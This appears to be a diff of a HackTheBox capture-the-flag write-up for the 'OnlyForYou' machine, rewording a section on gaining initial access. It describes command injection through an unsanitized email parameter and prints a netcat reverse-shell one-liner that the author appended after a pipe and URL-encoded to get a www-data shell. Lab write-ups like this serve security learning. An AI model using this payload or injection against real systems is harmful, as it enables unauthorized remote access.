F41zK4r1m/HackTheBox/OnlyForYou.md

 -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
 ### Initial access:

-Now, I have discovered the vulnerability by going through the source code in the send message part it's time to exploit it & get the reverse shell.
+After examining the source code, I discovered a vulnerability in the send message function.
+The next step was to exploit it and gain a reverse shell.
+Here's the request I used while testing the functionality:
-This is the request part when I was checking the send message functionality :

 ![image](https://user-images.githubusercontent.com/87700008/234578655-95edfce7-dd90-496c-821d-11e22b099a9c.png)

-Since the domain variable is not properly sanatized & e-mail address is not very stict we can inject our payload in the e-mail parameter.
+Because the domain variable is not properly sanitized and the email address is not strictly validated, we can inject our payload in the email parameter.

-I tried multiple payloads options but I found this paylod gave the the reverse shell:
+I tried multiple payloads and finally found one that gave me a reverse shell:
 ```
 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc IP Port >/tmp/f
 ```

-I added the payload after the e-mail address using the pipe & encoded it in URL format:
+I added the payload after the email address using the pipe character and encoded it in URL format:

 ![image](https://user-images.githubusercontent.com/87700008/234580735-40a623a9-5c7d-46fb-98ec-b7b8d88df9f7.png)

-And, finally I received the shell, with the www-data user (pwn3d🙂!):
+Finally, I received the shell with the www-data user.(pwn3d🙂!)

 ![image](https://user-images.githubusercontent.com/87700008/234581090-1a5947c4-398d-4839-92e1-659badd81f85.png)